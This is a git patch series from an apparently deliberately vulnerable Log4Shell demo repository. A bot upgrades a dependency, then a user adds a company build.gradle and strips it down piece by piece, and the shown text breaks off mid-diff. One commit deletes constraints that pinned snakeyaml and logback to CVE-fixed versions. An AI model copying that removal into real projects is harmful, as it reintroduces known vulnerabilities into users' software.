From 8ef9c90a29bc8f48a01458beeea8b8afdcd05c01 Mon Sep 17 00:00:00 2001 From: snyk-bot Date: Thu, 18 Jul 2024 02:24:13 +0000 Subject: [PATCH 01/38] fix: log4shell-goof/log4shell-server/pom.xml to reduce vulnerabilities The following vulnerabilities are fixed with an upgrade: - https://snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-7433720 --- log4shell-goof/log4shell-server/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index 94de0952b2..593d2298d7 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -30,7 +30,7 @@ io.undertow undertow-core - 2.2.13.Final + 2.3.8.Final commons-collections From 513a312ab078f76f726e683a259676634382d896 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:46:59 -0400 Subject: [PATCH 02/38] Create build.gradle --- build.gradle | 284 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 284 insertions(+) create mode 100644 build.gradle diff --git a/build.gradle b/build.gradle new file mode 100644 index 0000000000..9b8da9a2b8 --- /dev/null +++ b/build.gradle @@ -0,0 +1,284 @@ +buildscript { + ext { + projectName = 'hyrax' + projectVersion = version + buildNumber = System.env.BUILD_NUMBER ?: "1" + arch = 'noarch' + awaitilityVersion = '4.1.0' + commonsCollection4Version = '4.4' + commonsIOVersion = '2.8.0' + commonsLang3Version = '3.12.0' + ehcacheVersion = '3.8.1' + geronimoSpecJavaMail = '1.8.4' + googleCloudBomVersion = '26.42.0' + gradleGitPropertiesVersion = '2.3.2' + httpBuilderVersion = '0.6' + httpClientVersion = '5.2.3' + honeycombOpentelemetryVersion = '1.5.2' + janinoVersion = '3.1.10' + javaxCacheVersion = '1.1.1' + lombokPluginVersion = '5.3.3.3' + mockitoVersion = '3.12.3' + snakeYamlVersion = '1.33' + sonarQubePluginVersion = '2.6.2' + springBootAdminVersion = '3.2.3' + springBootVersion = '3.2.5' + junitVersion = '5.10.1' + testContainerVersion = '1.19.3' + nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' + nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" + nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" + applicationDefaultJvmArgs = [ + "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + ] + dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() + } + repositories { + maven { url "${nexus}" } + mavenCentral() + mavenLocal() + maven { url "https://plugins.gradle.org/m2/" } + } +} +plugins { + id 'java' + id 'maven-publish' + id 'jacoco' + id 'checkstyle' + id 'org.springframework.boot' version "${springBootVersion}" + id 'org.sonarqube' version "${sonarQubePluginVersion}" + id 'com.gorylenko.gradle-git-properties' version "${gradleGitPropertiesVersion}" + id 'io.freefair.lombok' version "${lombokPluginVersion}" + id 'com.google.cloud.tools.jib' version '3.4.3' +} +java { + toolchain { + languageVersion = JavaLanguageVersion.of(17) + } +} +ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() +ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") +jacoco { + toolVersion = "0.8.8" +} +repositories { + mavenLocal() + mavenCentral() + maven { url "${nexus}" } +} +checkstyle { + configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") + toolVersion = "5.9" +} +configurations.configureEach { + resolutionStrategy.cacheChangingModulesFor 0, 'seconds' + exclude module: "spring-boot-starter-tomcat" + exclude module: "log4j" + exclude module: "log4j-api" + exclude module: "android-json" +} +dependencies { + implementation platform("org.springframework.boot:spring-boot-dependencies:${springBootVersion}") + implementation "org.springframework.boot:spring-boot-starter-web" + implementation "org.springframework.boot:spring-boot-starter-jetty" + implementation("org.springframework.boot:spring-boot-starter-webflux") + implementation("org.springframework.boot:spring-boot-starter-oauth2-client") + // tag::actuator[] + implementation "org.springframework.boot:spring-boot-starter-actuator" + // end::actuator[] + implementation "org.springframework.boot:spring-boot-starter-security" + implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' + constraints { + implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { + because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" + } + implementation("ch.qos.logback:logback-core:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + implementation("ch.qos.logback:logback-classic:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + } + implementation("org.springframework.boot:spring-boot-starter-cache") + implementation "org.springframework.boot:spring-boot-starter-cache" + // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this + implementation "org.springframework:spring-tx" + implementation "org.codehaus.janino:janino" + implementation("com.xmatters:springbok:${springbokVersion}") { + exclude group: 'org.bouncycastle', module: 'bcprov-jdk15on' + } + implementation("com.xmatters:customer-config-client:4.347.0") + implementation group: "com.xmatters", name: "xm-zuulproxy", version: "${xmZuulProxyVersion}", changing: true + implementation("org.apache.httpcomponents.client5:httpclient5:${httpClientVersion}") + implementation("org.apache.commons:commons-collections4:${commonsCollection4Version}") + implementation("org.apache.commons:commons-lang3:${commonsLang3Version}") + implementation 'io.prometheus:simpleclient:0.16.0' + implementation "de.codecentric:spring-boot-admin-starter-client:${springBootAdminVersion}" + implementation "com.xmatters:spring-boot-starter-xmatters:${xmSpringBootStarterVersion}" + implementation "org.ehcache:ehcache:${ehcacheVersion}" + implementation "javax.cache:cache-api:${javaxCacheVersion}" + implementation "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.17.1" + implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" + implementation 'redis.clients:jedis:5.1.2' + implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" + // Websocket/STOMP + implementation "org.springframework.boot:spring-boot-starter-websocket" + implementation 'org.springframework:spring-messaging' + // Consul client library, may be used for service registration and Key/Value API + implementation('com.ecwid.consul:consul-api:1.4.2') { + exclude group: 'com.google.code.gson', module: 'gson' + } + implementation 'javax.xml.bind:jaxb-api:2.3.1' + implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' + // SMTP for email bounce back + implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" + implementation 'com.sun.activation:javax.activation:1.2.0' + // https://cloud.google.com/java/docs/bom + implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") + implementation 'com.google.code.gson:gson' + implementation 'com.google.guava:guava' + implementation 'com.google.cloud:google-cloud-pubsub' + implementation 'com.google.cloud:google-cloud-storage' + implementation 'com.google.cloud:google-cloud-tasks' + testImplementation "org.junit.vintage:junit-vintage-engine" + testImplementation "org.springframework.boot:spring-boot-starter-test" + testImplementation "org.mockito:mockito-inline:${mockitoVersion}" + testImplementation "org.awaitility:awaitility:${awaitilityVersion}" + testImplementation "com.github.codemonstur:embedded-redis:1.0.0" + // Needed for the HyraxAuthApiTestController and its associated configuration. + testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') + testImplementation(platform('org.junit:junit-bom:5.10.2')) + testImplementation('org.junit.jupiter:junit-jupiter') + testRuntimeOnly('org.junit.platform:junit-platform-launcher') + testImplementation( + "com.redis:testcontainers-redis:2.0.1", + "org.junit.jupiter:junit-jupiter-api", + "org.junit.jupiter:junit-jupiter-params", + "org.mockito:mockito-junit-jupiter:${mockitoVersion}", + "org.springframework.boot:spring-boot-starter-test", + "org.testcontainers:junit-jupiter:${testContainerVersion}", + "org.testcontainers:testcontainers:${testContainerVersion}", + ) +} +sonarqube { + properties { + property "sonar.projectVersion", version.split('-')[0] + property "sonar.language", "java" + property "sonar.scm.disabled", "true" + property "sonar.core.coveragePlugin", "Jacoco" + } +} +test { + // Checkstyle after test run + finalizedBy = [jacocoTestReport, check] + systemProperties = ["spring.profiles.active": "test, test-overrides"] + useJUnitPlatform() + testLogging { + exceptionFormat = 'full' + events "passed", "skipped", "failed", "standardOut", "standardError" + } +} +tasks.withType(JavaCompile).configureEach { + options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' +} +bootRun { + gradle.taskGraph.whenReady { taskGraph -> + if (taskGraph.hasTask(bootRun)) { + def error = ''' +Standalone DEV is no longer supported. Please use dev in the cloud for local development. +To discourage further use of this function, you will be presented with a bad dad joke each time you run it! + +''' + try { + def response = 'curl https://icanhazdadjoke.com/'.execute().text + error += '*' * response.length() + error += '\n' + response + '\n' + error += '*' * response.length() + } catch (e) { + error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' + } + throw new GradleException(error) + } + } +} +// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, +// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains +// remotes/origin or origin/, since we don't care about that. +def sanitize = { input -> + return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); +} +def buildNumber = System.env.BUILD_NUMBER ?: "1" +def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() +def githash = 'git rev-parse --short HEAD'.execute().text.trim() +def gitbranchTag = sanitize(gcpGitbranch) +def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" +def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" +def dockerTag = "${dockerRepo}:${dockerTagShort}" +def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" +//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto +// other upstream callers that are unable to figure out this information on their own. +tasks.register('versionProp') { + onlyIf { true } + doLast { + new File("$project.buildDir/gcpBuildVersion.properties").text = """ +APPLICATION="hyrax" +VERSION=${project.version} +BUILD=${buildNumber} +BRANCH=${gcpGitbranch} +GIT_HASH=${githash} +TAG_FULL=${dockerTag} +TAG=${dockerTagShort} +TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} +BUILD_TYPE=${buildType} +""" + } +} +generateGitProperties.finalizedBy versionProp +jib { + from { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" + } + to { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" + tags = ['latest', dockerTagShort] + } + container { + entrypoint = ["/entrypoint.sh"] + mainClass = "com.xmatters.cloudagent.Application" + ports = ['8083'] + containerizingMode = 'exploded' + environment = [ + SERVICE : "hyrax", + OTEL_JAVAAGENT_LOGGING: "application", + OTEL_JAVAAGENT_DEBUG : "false", + OTEL_METRICS_EXPORTER : "none", + JVM_MEMORY : "-XX:MaxRAMPercentage=50", + JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", + JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", + JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", + HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", + THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", + LOG_HOME : "/var/log/xmatters/hyrax", + INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() + ] + labels = [ + maintainer: "mustafar@xmatters.com", + app : "hyrax", + owner : "Mustafar", + version : "${version}", + role : "api" + ] + extraDirectories { + paths { + path { + from = file('docker/files') + into = '/' + includes = ['entrypoint.sh'] + } + } + permissions = [ + '/entrypoint.sh': '755' + ] + } + } +} From e9f3b1d23a49e9fff3c729da6f5eb247e4a5b87c Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:51:23 -0400 Subject: [PATCH 03/38] Update build.gradle --- build.gradle | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/build.gradle b/build.gradle index 9b8da9a2b8..3abbaff430 100644 --- a/build.gradle +++ b/build.gradle @@ -83,9 +83,7 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-jetty" implementation("org.springframework.boot:spring-boot-starter-webflux") implementation("org.springframework.boot:spring-boot-starter-oauth2-client") - // tag::actuator[] implementation "org.springframework.boot:spring-boot-starter-actuator" - // end::actuator[] implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' constraints { @@ -101,7 +99,6 @@ dependencies { } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" - // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this implementation "org.springframework:spring-tx" implementation "org.codehaus.janino:janino" implementation("com.xmatters:springbok:${springbokVersion}") { @@ -121,19 +118,15 @@ dependencies { implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" implementation 'redis.clients:jedis:5.1.2' implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" - // Websocket/STOMP implementation "org.springframework.boot:spring-boot-starter-websocket" implementation 'org.springframework:spring-messaging' - // Consul client library, may be used for service registration and Key/Value API implementation('com.ecwid.consul:consul-api:1.4.2') { exclude group: 'com.google.code.gson', module: 'gson' } implementation 'javax.xml.bind:jaxb-api:2.3.1' implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' - // SMTP for email bounce back implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" implementation 'com.sun.activation:javax.activation:1.2.0' - // https://cloud.google.com/java/docs/bom implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") implementation 'com.google.code.gson:gson' implementation 'com.google.guava:guava' @@ -169,7 +162,6 @@ sonarqube { } } test { - // Checkstyle after test run finalizedBy = [jacocoTestReport, check] systemProperties = ["spring.profiles.active": "test, test-overrides"] useJUnitPlatform() @@ -201,9 +193,7 @@ To discourage further use of this function, you will be presented with a bad dad } } } -// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, -// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains -// remotes/origin or origin/, since we don't care about that. + def sanitize = { input -> return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); } @@ -215,8 +205,7 @@ def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githas def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" def dockerTag = "${dockerRepo}:${dockerTagShort}" def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" -//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto -// other upstream callers that are unable to figure out this information on their own. + tasks.register('versionProp') { onlyIf { true } doLast { From d52e02dfc5ef83461b4b61fdb8cf52368ee5a4c2 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:53:30 -0400 Subject: [PATCH 04/38] Update build.gradle --- build.gradle | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/build.gradle b/build.gradle index 3abbaff430..8d64c41597 100644 --- a/build.gradle +++ b/build.gradle @@ -138,7 +138,7 @@ dependencies { testImplementation "org.mockito:mockito-inline:${mockitoVersion}" testImplementation "org.awaitility:awaitility:${awaitilityVersion}" testImplementation "com.github.codemonstur:embedded-redis:1.0.0" - // Needed for the HyraxAuthApiTestController and its associated configuration. + testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') testImplementation(platform('org.junit:junit-bom:5.10.2')) testImplementation('org.junit.jupiter:junit-jupiter') @@ -219,7 +219,6 @@ TAG_FULL=${dockerTag} TAG=${dockerTagShort} TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} BUILD_TYPE=${buildType} -""" } } generateGitProperties.finalizedBy versionProp From 98b38f3df98ff044c375ff8f76ae00c47952747e Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:53:56 -0400 Subject: [PATCH 05/38] Update build.gradle --- build.gradle | 1 + 1 file changed, 1 insertion(+) diff --git a/build.gradle b/build.gradle index 8d64c41597..b13673a80e 100644 --- a/build.gradle +++ b/build.gradle @@ -219,6 +219,7 @@ TAG_FULL=${dockerTag} TAG=${dockerTagShort} TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} BUILD_TYPE=${buildType} +""" } } generateGitProperties.finalizedBy versionProp From 9e9ec344a684eef0b06fb523b3ebff94d32524c3 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:55:56 -0400 Subject: [PATCH 06/38] Update build.gradle --- build.gradle | 13 ------------- 1 file changed, 13 deletions(-) diff --git a/build.gradle b/build.gradle index b13673a80e..fdbd192f6d 100644 --- a/build.gradle +++ b/build.gradle @@ -208,19 +208,6 @@ def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" tasks.register('versionProp') { onlyIf { true } - doLast { - new File("$project.buildDir/gcpBuildVersion.properties").text = """ -APPLICATION="hyrax" -VERSION=${project.version} -BUILD=${buildNumber} -BRANCH=${gcpGitbranch} -GIT_HASH=${githash} -TAG_FULL=${dockerTag} -TAG=${dockerTagShort} -TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} -BUILD_TYPE=${buildType} -""" - } } generateGitProperties.finalizedBy versionProp jib { From f35a0e417c228cf4ad0c1edc3e8c8b36047201e4 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:56:47 -0400 Subject: [PATCH 07/38] Update build.gradle --- build.gradle | 5 ----- 1 file changed, 5 deletions(-) diff --git a/build.gradle b/build.gradle index fdbd192f6d..9b0c91311e 100644 --- a/build.gradle +++ b/build.gradle @@ -176,11 +176,6 @@ tasks.withType(JavaCompile).configureEach { bootRun { gradle.taskGraph.whenReady { taskGraph -> if (taskGraph.hasTask(bootRun)) { - def error = ''' -Standalone DEV is no longer supported. Please use dev in the cloud for local development. -To discourage further use of this function, you will be presented with a bad dad joke each time you run it! - -''' try { def response = 'curl https://icanhazdadjoke.com/'.execute().text error += '*' * response.length() From 4c6aea6a18ef92d7b6dd4b13c0c99a9df5c60889 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:58:14 -0400 Subject: [PATCH 08/38] Update build.gradle --- build.gradle | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/build.gradle b/build.gradle index 9b0c91311e..4caf6122bf 100644 --- a/build.gradle +++ b/build.gradle @@ -29,7 +29,7 @@ buildscript { nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" applicationDefaultJvmArgs = [ - "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } From c2d417324f52d5d47fc861de79ae6c5fcb41a176 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:59:00 -0400 Subject: [PATCH 09/38] Update build.gradle --- build.gradle | 21 --------------------- 1 file changed, 21 deletions(-) diff --git a/build.gradle b/build.gradle index 4caf6122bf..32b360e9bd 100644 --- a/build.gradle +++ b/build.gradle @@ -218,27 +218,6 @@ jib { mainClass = "com.xmatters.cloudagent.Application" ports = ['8083'] containerizingMode = 'exploded' - environment = [ - SERVICE : "hyrax", - OTEL_JAVAAGENT_LOGGING: "application", - OTEL_JAVAAGENT_DEBUG : "false", - OTEL_METRICS_EXPORTER : "none", - JVM_MEMORY : "-XX:MaxRAMPercentage=50", - JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", - JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", - JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", - HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", - THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", - LOG_HOME : "/var/log/xmatters/hyrax", - INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() - ] - labels = [ - maintainer: "mustafar@xmatters.com", - app : "hyrax", - owner : "Mustafar", - version : "${version}", - role : "api" - ] extraDirectories { paths { path { From 4e39e44ec21bfce06e3e08f85f52e19831c275a9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:59:50 -0400 Subject: [PATCH 10/38] Update build.gradle --- build.gradle | 28 ---------------------------- 1 file changed, 28 deletions(-) diff --git a/build.gradle b/build.gradle index 32b360e9bd..ce3626cb4c 100644 --- a/build.gradle +++ b/build.gradle @@ -204,31 +204,3 @@ def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" tasks.register('versionProp') { onlyIf { true } } -generateGitProperties.finalizedBy versionProp -jib { - from { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" - } - to { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" - tags = ['latest', dockerTagShort] - } - container { - entrypoint = ["/entrypoint.sh"] - mainClass = "com.xmatters.cloudagent.Application" - ports = ['8083'] - containerizingMode = 'exploded' - extraDirectories { - paths { - path { - from = file('docker/files') - into = '/' - includes = ['entrypoint.sh'] - } - } - permissions = [ - '/entrypoint.sh': '755' - ] - } - } -} From 326059a01b50ac0f49d6d25fa2fb4cc809002560 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:00:29 -0400 Subject: [PATCH 11/38] Update build.gradle --- build.gradle | 3 --- 1 file changed, 3 deletions(-) diff --git a/build.gradle b/build.gradle index ce3626cb4c..5f8cddd327 100644 --- a/build.gradle +++ b/build.gradle @@ -2,7 +2,6 @@ buildscript { ext { projectName = 'hyrax' projectVersion = version - buildNumber = System.env.BUILD_NUMBER ?: "1" arch = 'noarch' awaitilityVersion = '4.1.0' commonsCollection4Version = '4.4' @@ -26,8 +25,6 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' - nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" - nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" applicationDefaultJvmArgs = [ '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' ] From ac1f8fb58bdaeea9e816bab59b7a89bec40646eb Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:01:44 -0400 Subject: [PATCH 12/38] Update build.gradle --- build.gradle | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/build.gradle b/build.gradle index 5f8cddd327..0bb0e0bebf 100644 --- a/build.gradle +++ b/build.gradle @@ -83,17 +83,6 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-actuator" implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' - constraints { - implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { - because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" - } - implementation("ch.qos.logback:logback-core:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - implementation("ch.qos.logback:logback-classic:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" implementation "org.springframework:spring-tx" From bbe27d0cd2cdb83abdac96f12308268954dd8ec9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:03:10 -0400 Subject: [PATCH 13/38] Update build.gradle --- build.gradle | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/build.gradle b/build.gradle index 0bb0e0bebf..3370bea62c 100644 --- a/build.gradle +++ b/build.gradle @@ -175,18 +175,3 @@ bootRun { } } -def sanitize = { input -> - return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); -} -def buildNumber = System.env.BUILD_NUMBER ?: "1" -def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() -def githash = 'git rev-parse --short HEAD'.execute().text.trim() -def gitbranchTag = sanitize(gcpGitbranch) -def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" -def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" -def dockerTag = "${dockerRepo}:${dockerTagShort}" -def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" - -tasks.register('versionProp') { - onlyIf { true } -} From ead579de06945441d83b7010991627f3d7223c9b Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:03:57 -0400 Subject: [PATCH 14/38] Update build.gradle --- build.gradle | 36 +----------------------------------- 1 file changed, 1 insertion(+), 35 deletions(-) diff --git a/build.gradle b/build.gradle index 3370bea62c..5cd7d3917a 100644 --- a/build.gradle +++ b/build.gradle @@ -139,39 +139,5 @@ dependencies { "org.testcontainers:testcontainers:${testContainerVersion}", ) } -sonarqube { - properties { - property "sonar.projectVersion", version.split('-')[0] - property "sonar.language", "java" - property "sonar.scm.disabled", "true" - property "sonar.core.coveragePlugin", "Jacoco" - } -} -test { - finalizedBy = [jacocoTestReport, check] - systemProperties = ["spring.profiles.active": "test, test-overrides"] - useJUnitPlatform() - testLogging { - exceptionFormat = 'full' - events "passed", "skipped", "failed", "standardOut", "standardError" - } -} -tasks.withType(JavaCompile).configureEach { - options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' -} -bootRun { - gradle.taskGraph.whenReady { taskGraph -> - if (taskGraph.hasTask(bootRun)) { - try { - def response = 'curl https://icanhazdadjoke.com/'.execute().text - error += '*' * response.length() - error += '\n' + response + '\n' - error += '*' * response.length() - } catch (e) { - error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' - } - throw new GradleException(error) - } - } -} + From b0ab5dc1a7091e6450b1a7af31af397db70536f3 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:06:04 -0400 Subject: [PATCH 15/38] Update build.gradle --- build.gradle | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/build.gradle b/build.gradle index 5cd7d3917a..2b67bd55b3 100644 --- a/build.gradle +++ b/build.gradle @@ -63,10 +63,7 @@ repositories { mavenCentral() maven { url "${nexus}" } } -checkstyle { - configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") - toolVersion = "5.9" -} + configurations.configureEach { resolutionStrategy.cacheChangingModulesFor 0, 'seconds' exclude module: "spring-boot-starter-tomcat" From 1957a5b50cab405b1b05b256a5ec905ce4fcc86b Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:06:57 -0400 Subject: [PATCH 16/38] Update build.gradle --- build.gradle | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/build.gradle b/build.gradle index 2b67bd55b3..442e29675e 100644 --- a/build.gradle +++ b/build.gradle @@ -53,8 +53,7 @@ java { languageVersion = JavaLanguageVersion.of(17) } } -ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() -ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") + jacoco { toolVersion = "0.8.8" } From 25137c8f6c060dced199cb8f46cf5cbfd94f0da0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 13:20:20 -0400 Subject: [PATCH 17/38] Update build.gradle --- build.gradle | 3 --- 1 file changed, 3 deletions(-) diff --git a/build.gradle b/build.gradle index 442e29675e..ca089e8a44 100644 --- a/build.gradle +++ b/build.gradle @@ -25,9 +25,6 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' - applicationDefaultJvmArgs = [ - 